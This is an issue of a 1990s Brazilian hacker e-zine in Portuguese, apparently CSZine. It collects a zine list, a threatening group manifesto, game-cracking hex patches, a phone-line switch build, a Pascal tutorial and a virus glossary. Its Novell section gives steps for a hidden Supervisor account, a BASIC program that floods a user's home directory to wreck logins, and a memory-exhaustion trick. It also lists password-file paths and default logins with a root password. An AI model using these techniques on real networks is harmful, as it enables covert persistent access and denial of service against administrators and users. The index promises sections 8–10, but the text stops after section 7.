                    zZZZZZZZZZZZZZZZZZZZZZZZZ
                                          zZ
                                         zZ
                                        zZ
                                       zZ
                                      zZ
                 CCCCCCCCCCCCCCCC    zZ SSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC   zZ SSSSSSSSSSSSSSSSS
               CCCCCCCCCCCCCCCCCC  zZ SSSSSSSSSSSSSSSSSS
              CCCCCC        CCCCC zZ SSSSSS        SSSSS
             CCCCCCC             zZ SSSSSSS
            CCCCCCCC            zZ SSSSSSSSSSSSSSSSSSSSS
            CCCCCCCC           zZ  SSSSSSSSSSSSSSSSSSSSS
             CCCCCCC          zZ                SSSSSSS
              CCCCCC        CCCCC  SSSSS        SSSSSS
               CCCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSS
                 CCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSS
                         zZ
                        zZ
                       zZ
                      zZ
                     zZ
                    zZZZZZZZZZZZZZZZZZZZZZZZZine

                        by Cheat Struck

	Belo visual naum?

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

		UIN   da   revista : 16623675
		Canal  da  revista : #CSCHANNEL no irc.via-rs.com.br
		E-Mails da revista : cszine@hotmail.com
	                             cszine@xoommail.com
                Memoserv da revista: /msg memoserv send Struck <msg>
                                      (Soh no via-rs)
	        Page  da   revista : http://members.xoom.com/cszine

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=

	Introdução:
	Nossa! Agora que eu fui perceber. A CSZine eh a que contém maior
numero de edições das zine Brasileiras. Pelo menos das zines que eu conheço.
Olha soh.. Nessa edição eu coloquei uma lista de numeros de todas as zines
que eu jah lí. Os endereços delas estão nessa lista tb, soh não garanto que
todos ainda funcionem, pois muitas zines dessas jah foram extintas.
	Agora analizando a CSZine com as zines de fora, tipo phrack(que jah
tah na 53a edição ou mais) a CSZine fica de lado. Porém jah passamos uma das
maiores zines da espanha, a SET(antiga saqueadores). Estamos no caminho.
	Ae vc chega: "tah mas a Axur05 eh bem maior". Reconheço que a maior
parte das zines são gigantescas no seu tamanho. Mas vamos pegar o exemplo da
Axur05. Juntando as 4 edições da Axur nós temos 457Kb, emquanto juntando
todas as edições da CSZine nos atingimos 556Kb. Legal neh. Passamos em tama-
nho da maior e melhor(Tb acho) zine hacking brasileira.
	Se vc prefere que a CSZine seja mensal e no inicio de cada mes eu
atualize a page (ao invéz de atualiza-la 2x por semana) para que vc gaste uma
meia hora para baixar uma unica edição. Tudo bem. Mandem mails para mim que
a maioria vai ganhar(embora eu não aredite muito em democracia).
	Falow Malukos!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Indice:

Seção:	Materia:		Assunto:		Autor:		Nota:
1.	Lista de zines		Lista de zines br.	Cheat Struck	10,0
2.	Manifesto		MOS Manifesto		Membros da MOS	9,5
3.	Crackerz		Crackeando Jogos	Cheat Struck
				Outros Crackz		WarJones	10,0
4.	Phreaking		Nova BOX Brasileira	Cheat Struck	10,0
5.	Programação		Tutorial de Pascal	Cheat Struck	9,5
6.	VIRII			Informações sobre virus	Thunder BYTE	9,0
7.	Bugz			Bugz para redes Novell	Simon Phoenix	10,0
8.	Invasão de privacidade	Windows 95		Cheat Struck	9,0
9.	Hack, the Art		Novas backdoors		Cheat Struck	9,5
10.	¡¡¡BoNuS!!!		Lista de provedores	Cheat Struck	10,0

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                   $$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  1. Lista de zines  $$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                   $$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Lista de zines brasileiras

	OBS1: O numero entre parenteses ao lado do nome da zine é o numero de
edições da zine.
	OBS2: Aki estah a lista de zines serios. O barata Eletrica e o
Technoraculo não aparecem pois são mais zines de noticias.

* ALZINE (3)
  http://www.geocities.com/siliconvalley/way/7029

* AXUR05 (4)
  http://www.axur05.org

* B.H.J. - Brasilian Hackers Journal (1)
  http://www.geocities.com/SiliconValley/Heights/6152

* Count Down (1)
  http://www.geocities.com/Pentagon/Quarters/3673

* Chaos100 (3)
  http://www.geocities.com/Pentagon/5140
  http://chaos100.home.ml.org

* CYBERNETiK ZiNE (1)
  http://www.geocities.com/HotSprings/6381

* Ezine Conscience (5)
  http://www.civila.com/brasil/conscience

* FreeLand Zine (3)
  http://www.infolink.com.br/~andresb/index.htm

* Fucker World (3)
  http://members.xoom/fw1

* DOV (2)
  http://www.geocities.com/Baja/5153

* Hack and Phreak (5)
  http://www.hackphr.home.ml.org

* Immortal Zine (1)
  http://www.loc.base.org

* Linux Journal (1)
  http://www.openline.com.br/linux-br

* KMC Zine (2)
  http://www.thepentagon.com/kmc
  http://members.tripod.com/~the_kmc

* MOS, Boletim Tecnico (1)
  http://www.thepentagon.com/mos

* Near(Z) (7)
  http://nearz.home.ml.org

* Zine NETHAC (3)
  http://www.geocities.com/SiliconValley/Lakes/2233
  http://www.geocities.com/SiliconValley/Lakes/3095

* POLICY SECURITY E-ZINE (2)
  http://www.thepentagon.com/policy

* PSICO CYBER (2)
  http://www.angelfire.com/id/psicocyber

* Quebra de Sigilo (2)
  player@mandic.com.br
  renatoma@mandic.com.br

* Rnet Zine Hacker (2)
  http://www.lpnet.com.br/users/rnet

* RWX (6)
  http://www.rwx.ml.org

* Thë Brasilian Phreakers Journal (2)
  http://phineas.home.ml.org

* UHF - Unit Hacker Force (3)
  http://uhf.home.ml.org

* Woh Zine (13)
  http://www.geocities.com/Athens/Acropolis/7632

	Total de Zines   : 25
	Total de edições : 78
	Boa literatura heim? E pensar que eu jah lí tudo isso.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  2. Manifesto  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	MOS Manifesto

	Atenção!!! Estre Manifesto estava todo escrito na Letra Original que
o grupo MOS inventou. Porém, por ficar muito ruim de lêr eu passei-o para o
normal.

	Nos somos do M.O.S., o melhor grupo underground do pais. Nos assumi-
mos isso publicamente porque nos somos simplesmente os melhores.
	Nos somos eleet. ok, nos somos muito mais que isso, mas a unica coisa
que você realmente precisa saber, e' que nos somos ELEET!
	Vocês nos chamam de lamerz, mas por tras disso, esconde-se o fato de
que você se quer consegue imaginar oque podemos fazer com a tecnologia, e
como o fazemos. Esconde-se a sua inferioridade, e a mediocridade da sua falta
de conhecimenTo.
	Nos somos tão bons que nem se você conseguise usar o maximo da merda
do seu cerebro, poderia contar quantos hosts nos ja hackeamos. Se você ao
menos tentasse descobrir os trojans que ja criamos e implantamos em cada
servidor, você com certeza mijaria em suas calças.
	Nos não temos problemas de celular, pois horientamos a rota de nossas
ligações. Nos podemos desligar seu telefone num piscar de olhos se assim nos
interessar. podemos te achar no fim do mundo se preciso for. podemos propagar
o CAOS, e impor o medo no mais incredulo dos corações. Nos hackeamos o estado
, o governo, e a porra dos militares, nos fizemos o primeiro viruz de macro
do país! Nos ja infectamos e rootamos mais sistemas do que você seuer conse-
gue imaginar! Nos somos da MOS, e podemos fazer o que quisermos.
	Vamos encarar os fatos, vivemos em um mundo de zeros e ums, em que
quem comanda sua misera vida são as maquinas, as quais você teme, pois não
consegue comprender.
	Você e' tão burro que tem ate dificuldade em ler esse texto!
	Você não pode nos parar. Nos, nos escondemos na sombra do meio-dia,
vivemos em outra realidade, a qual você tambem não pode compreender...
	Nos, somos o inicio do cyber-caos, a reencarnação do mal. Nosso
prazer e' lhe fazer de burro, tirar seu sono, tirar sua calma. Nosso prazer
e' conseguir algo publico, que você despreza: o *conhecimento*.
	Nos, somos aqueles que farão você pensar 2 vezes antes de ligar o
computador, ou usar o telefone. E tudo o que vocês lamerz podem tentar fazer
para escapar a nossa furia, e' desligar-se da tomada....
	Não tente se rebelar, do contrario, nos acharemos seu sistema, seu
telefone, e você ira perceber que existem coisas piores que a morte...
							   [Membros da MOS]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-==-=-=-=-=-=

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$             $$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  3. Crackerz  $$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$             $$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-==-=-=-=-=-=--=-=-=-

	Crackeando Jogos.

       Eu andava pensativo.. pensativo.. pensando no que colocar nessa seção.
Jah que a lista de hexas não passa muita informação, embora seja a primeira
lista de hexas no Brasil. Pelo menos eu não achei nenhuma. Então decidi. Eu
vou continuar com a lista, mas separado da zine. Quando acabar ela, vai estar
na area oThErS da page.
	Então o que colocar no lugar?? Que tal crackearmos jogos??
	Claro que não vamos começar com algo grandioso tipo.. Crackear o "The
Neverhood". Vamos começar de baixo, com jogos simples.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tipo.. Descobrindo as passwords do jogo.

	Vamos tomar como exemplo o BlackThorne. É meio antigo mas ainda agra-
da um bom publico. Primeiro de uma jogadinha e descubra a senha para a prime-
ira e segunda fase(rapidinho).
	Seriam:

FBWC
QP7R

	Agora rode o editor hexadecimal no jogo e procure por essas Strings.
A primeira estara em 78.511, a segunda em 78.521. Notou a semelhança?? Todas
acabam com 1. Conte os caracteres da senha(4). Agora conte os Caracteres
entre uma passwd e outra(6), total, de dez em dez conjunto de hexas esta uma
password.
	Com isso e' possivel tirar uma lista detalhada das passwords do jogo.

FBWC		TJ1F		MJXG
QP7R		GSG3		K3CH
WJTV		BMHS		L8VJ
RRYB		Y4DJ		PBKT
Z59P		HCKD		TNLQ
XJ5N		NRLF		FMWY
CGDN		J6BZ		L2RP

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tipo.. trocando Personagens

	Esse e' o meio mais facil. Eu fazia muito antes de saber oque era
um Warez. A primeira vez que fiz foi com o jogo "Hugo House of Horros".
	E' moleza. Repare que no jogo tipo esse existem varios arquivos com
nomes diferentes e com a mesma extenção. Tipo..

 mummy.hhh
 dog.hhh
 oldman.hhh

	Cada arquivo desses equivale a um personagem do jogo. Entao a unica
coisa que você tem que fazer e' nomear um com o nome do outro. Tipo.. Se eu
quisesse que a mumia aparecesse no lugar do cachoro..

 mummy.hhh  <--- Rename dog.hhh
 dog.hhh    <--- Rename mummy.hhh
 oldman.hhh

	Porém isso resultaria em alguns danos como o cão se movimentaria como
a mumia, então se por exemplo a mumia tivesse o movimento de salto e o cão
não. O jogo faria com que o cão fizesse um movimento qquer mas saltasse.
	Outro jogo que eu fiz isso foi um bem antigão. Para PC-XT. Acho que
era "YO-NOID vs XXXX", onde vc jogava com um carinha e tinha que escapar dos
YO-NOIDS(Uns carinhas tipo o Chapolim). Ae eu troquei os arquivos do YO-NOID
pelo do carinha com quem tu jogava. Resultado: Joguei com os YO-NOIDS e tinha
que fugir dos homenzinhos.
	Em jogos de luta isso pode ser meio útil. Imagina no "Street II".
Dar um Hadouken apertando <-, ->, soko.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=

	Outros Crackz (por WarJones)

	-=-=-=-=WORLD CIRCUIT=-=-=-=-=-
	Rode o editor hexadecimal no jogo e modifique a linha:

BA 43 00 B0 00 EE 4A 4A		<--- Linha original.
BB 92 0B B8 0B 00 54 CB		<--- Linha modificada.

	Agora entre no jogo e digite a senha "MONZA".

	-=-=-=-=-=LOST VIKINGS=-=-=-=-=-
	Rode o editor hexadecimal no arquivo setup.exe e modifique a linha:

3B 87 C6 08 75 12 33		<--- Linha original.
3B 87 C6 08 90 90 33		<--- Linha modificada.

	-=-=-=-=-=THE SIMPSONS=-=-=-=-=-
	Rode o editor hexa no simpsons.exe e modifique a linha:

74 1A A0 E4 47			<--- Linha original.
EB 1A A0 E4 47			<--- Linha modificada.

	-=-=-=-=-=THE NEED FOR SPEED=-=-=-=-=-
	Jogue o torneio e salve o jogo em qquer parte. Ae rode o editor hexa
no arquivo de jogo salvo e modifique a linha:

5A 00 20 00 43 00 48 00 00 00 00 00 00 00 00 00 00 00 00    <--- Original.
5A 00 20 00 43 00 48 00 01 00 01 00 01 00 01 00 01 00 01    <--- Modificada.

	Agora va no local onde se coloca os nomes. Aki estão os códigos:

EAC POWR	-	The Warrior Car
EAC WARP	-	Speed
EAC RALY	-	Rusty Springs

	-=-=-=-=-=SIM EARTH=-=-=-=-=-
	Rode o editor hexa no simearth.exe e modifique a linha:

74 03 E9 46 01		<--- Original.
74 00 E9 40 01		<--- Modificada.

	-=-=-=-=-=POPULOUS=-=-=-=-=-
	Rode o editor hexadecimal no populous.exe e modifique a linha:

3B 46 0C 75 09 8B 46 0C A3 82 2A	<--- Original.
3B 46 0C 74 09 8B 46 0C A3 82 2A	<--- Modificada.

	-=-=-=-=-=MEGA RACE 2=-=-=-=-=-
	Salve o jogo em qquer parte. Rode o DEBUG no jogo e digite:

e 124 ff ff ff
w
q

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  4. Phreaking  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Nova BOX Brasileira

	Ao contrario de muitos que dizem que estão com planos de boxes em
mente, mas nunca fazem nada. Eu estou trazendo as boxes dos EUA para o Brasil
e descobrindo novas.
	Essa e' novissima! Descobri ainda essa semana.
	O que ela faz eh permitir que uma extenção ou a linha inteira do
telefone funcione ou não usando apenas um botão. Animal neh. Imagina soh..
Seu irmão menor ligou para o seu pai (que estah trabalhando e ficaria furio-
so em ser interrompido por uma besteira) para contar que vc bateu nele.
	Então ele todo felizinho por ter se trancado no quarto com o telefone
sem fio e vc não podera impedilo. Ai se chega nessa box estratégicamente
colocada atraz da geladeira e desliga a linha temporariamente apertando ape-
nas um botãozinho.
	Legal naum?
	Faça o seguinte.. Na sua casa deve ter dakeles abajur antigos que
tem o botão de liga/desliga parecido com um interruptor neh?? Pegue um jah
que não estejam usando e corte os fios botão-lampada e do botão-tomada, sendo
que o botão é esse tipo interruptor liga/desliga.
	Aí ligue os 2 fios da extensao nesses dois fios arranjados.
	Fica mais ou menos assim:

                         __________
fio1 do telefone        /  ______  \        fio2 do telefone
=================+=====|  |______|  |======+=================
                        \__________/
                      Akele botãozinho

	Pronto! Agora vc liga e desliga a extenção como se fosse um abajur.
	Animal neh? Como eu que inventei essa box, eu poderia batizala com
qquer nome, mas eu não tenho nada criativo pra pensar. Talvéz button box???
Não neh?
	Não duvido que apareça muito lokinho copiando e dizendo que inventou.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  5. Programação  $$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

	Vamos acabar logo com isso..

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tutorial de Pascal (ultima parte)

	»»»»»»»»»»»»»»» Ultimas Procedures ««««««««««

* New
  Cria nova variavel dinamica
  Sintaxe : New(var);

* Dispose
  Apaga o variavel
  Sintaxe : Dispose(var);

* Release
  Altera o valor da variavel para o topo
  Sintaxe : Release(var);

* Mark
  Atribui o valor topo atual
  Sintaxe : Mark(Var);

* GetMen
  Prende um valor no espaço HEAP
  GetMen(var, valor);

* FreeMen
  Libera um valor no espaço HEAP
  FreeMen(Var, valor);

	»»»»»»»»»»»»»»» Ultimas Functions «««««««««««««««

* MaxAvail
  Retorna o numero de paragrafos num bloco HEAP

* MenAvail
  Retorna o numero de paragrafos no HEAP

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Script para enganar os HACKERSÕES

	Primeiro adicione uma conta no sistema assim:

guest::9999:1:Hackerzao:/usr/guest:/usr/adm/guestlogin

	Agora coloque este script no /usr/adm/guestlogin

-------------------------------guestlogin------------------------------------
echo " Guest login" >> /var/adm/warn.guest
sleep 20
echo "/tmp/full"
sleep 5
echo "Acesso a Rede de Dados do Ministerio do Exercito Brasileiro"
echo "Espere um momento..."
sleep 120
exit

-----------------------------------------------------------------------------

	Com isso o kra vai entrar com a conta guest, ae fica o tempão espe-
rando o sistema responder, pensando que o sistema tah lotado, então cai.
	Sakanagem heim.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  6. VIRII  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Informaçãoes sobre virus (original de Thunder BYTE)

	Este texto foi escrito em ingles por Thunder BYTE e traduzido por
mim. Para quem não sabe, Thunder BYTE e' o criador do anti-virus TBAV, usado
na maioria das BBS.

******************** Informações sobre... ********************

	Trojan
	Isso não é um virus e sim um Trojan Horse. Ele não pode extender-se
porem pode causar diversos danos. Determina o caminho do arquivo e o deleta.

	Dropper
	Esse arquivo não é um virus, e sim uma Dropper do virus. Se vc rodar
esse arquivo ele irá instalar o virus no seu sistema. É recomendado que voce
delete esse arquivo.

	Joke
	Esse arquivo é completamente inocente. Ele somente imita uma ativida-
de de um virus mas é inofensivo de fato. Apenas delete-o se voce não gostar
dele.

	Garbage
	Isso não é um virus, apenas assume uma identidade parecida com a de
um vírus.

	Tool
	De fato, isso não e' apenas um virus, mas uma categoria vironica.

	Companheiro
	Esse é um companheiro do vírus. O que faz e' aquela velha rotina:
Se disfarça em um programa e ao executa-lo, inicia o vírus e depois o progra-
ma original.

******************** Os vírus podem infectar... ********************

	COM
	Arquivos COM.

	EXE
	Arquivos EXE.

	SYS
	Device drivers.

	BOOT
	Setores boot.

	Outros
	Porém alguns vírus possuem variantes desconhecidas podendo infectar
outros itens.

******************* Os vírus podem ser... *******************

	Residentes
	Ele pode permanecer residente na memoria e infectar/danificar outras
vitimas em segundo plano.

	Polimorphico
	O virus polimorphico fica diferente toda a vez que infecta um arquivo
. Qquer anti-virus tem dificuldades para detectar esse virus.

	Criptografado
	O virus encriptado usa uma assinatura complexa para que não possam
encontra-lo. Em compensação, os anti-virus não tem muitos problemas para
detectar esses virus.

	HLL
	O virus não é escrito em assembly, mas em uma linguagem de alto nível
(high-level language). Isso causa muitos alarmes falsos nos anti-virus.

	Stealth
	Esse virus tem capacidades 'stealth'(secretas), que servem para es-
conder certos dados de um usuario ou de um anti-virus.

	Mus
	Emite sons irritantes.

	Msg
	Exibe mensagens desagradaveis na tela.

	Hang
	Paraliza o sistema.

	Obvio
	E' um virus obvio feito para ser encontrado, as vezes para distrair
o usuario por um outro vírus mais fatal. Na maioria das vezes ele da' o sinal
para o vírus fatal.

	SClean
	Apaga informações em discos, incluindo em disquetes caso infecte o
boot. E' recomendavel que ative a proteção de gravação no diskete caso um
virus dessa categoria seja detectado.

	Data
	Este virus e' conhecido por corromper arquivos de dados. E' recomen-
davel a feita de um backup imediatamente, caso o virus seja detectado.

	Ovw
	Esse vírus não pode ser deletado. Caso isso aconteça, os arquivos
infectados por ele serão destruidos.

	Clean
	Este vírus destruirá todos arquivos executaveis que encontrar no
disco.

	ClnBoot
	Apaga o boot. Voce precisa restaurar o DOS bootsector original e/ou
arquivos de sistema. Tb formate todos os disketes que foram inseridos em
quanto o virus estava ativo, caso contrario o virus pode voltar.

	MBR
	Caso um virus com MBR seja detectado por um anti-virus, vc deve apa-
gar o codigo de partiçao. Você pode fazer isso pelo DOS digitando FDISK /MBR.

	EClean
	O virus pode possuir novas variantes vironicas que o antivirus não
saiba destinguir suas funções.

-=-=-=-==--==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$         $$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  7. Bugz  $$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$         $$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Bugz para Novell (por Simon Phoenix)

	Eu lí a materia que o Struck escreveu semana passada sobre redes
novell e achei meio fraca. Por isso eu decidi fazer mais uma parte na zine e
escrever sobre exatamente o que eu sei sobre os bugz encontrados em redes
novell. Espero que gostem.

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : 4.x
* Descrição : Contas fantasmas
* Exploit:
1. Execute o NWADMIN.
2. Crie um novo usuario.
3. De privilegios de administrador para o usuario.
4. Clique com o botão direito sobre o usuario.
5. Selecione trustees.
6. Elimine as trustees Root e Public.
7. Selecione o usuario e mude seus direitos.
8. De direito de Supervisor.
9. Selecione o Filtro de Direitos.
10. Cancele todos os valores.
11. Prontinho. A conta esta invisivel.

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : FTP Netware
* Descrição : Redução de memoria
* Exploit :
Basta abrir multiplas seções de FTP.

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : ?????
* Descrição : todas
* Exploit : (em basic)
---------------------------Corte Aki--(mkdirs.bas)---------------------------
CLS
INIT$ = "‡"
FOR A = 65 TO 90
A$ = CHR$(A)
FOR B = 65 TO 90
B$ = CHR$(B)
FOR C = 65 TO 90
C$ = CHR$(C)
FOR D = 65 TO 90
D$ = CHR$(D)
FOR E = 65 TO 90
E$ = CHR$(E)
FOR F = 65 TO 90
F$ = CHR$(F)
LOCATE 1, 1
PRINT "Diretorio: "; INIT$ + F$ + E$ + D$ + C$ + B$ + A$ + "
MKDIR INIT$ + F$ + E$ + D$ + C$ + B$ + A$
I = I + 1
NEXT
NEXT
NEXT
NEXT
NEXT
NEXT
-----------------------------------------------------------------------------

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : todas
* Descrição : Destruindo logins
* Exploit :
Rode o programa mkdirs.exe(fonte acima) no dir home do kra.

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : 2.x ,3.x e 4.x
* Descrição : Caminho do arquivo de senhas

(Os arquivos estão com atributo sistema e oculto)
Netware 2.x	 -	SYS:\SYSTEM\NET$BVAL.SYS
Netware 3.x	 -	SYS:\SYSTEM\NET$VAL.SYS
Netware 4.x 	 -	SYS:\_NETWARE\??.SYS

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : todas
* Descrição : Logins padrões

PRINT            -	Login para uso da impresora
LASER            -	idem
HPLASER          -	idem
PRINTER          -	idem
LASERWRITER      -	idem
DESKJET          -	idem
POST             -	Login para uso do email
MAIL             -	idem
GATEWAY          -	login para gateway
GATE             -	idem
ROUTER           -	login para router
BACKUP           -	login para copias de segurança
CHEY_ARCHSVR     -	idem
WANGTEK          -	login para ver copias de seguança
ARCHIVIST        -	idem
FAX              -	login para uso do fax
FAXUSER          -	idem
FAXWORKS         -	idem
TEST             -	login para testes
WINDOWS_PASSTHRU -	login para compartilhamento de recursos do Win95.
ROOT             -	Login do root. A senha é AdminGUI

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$
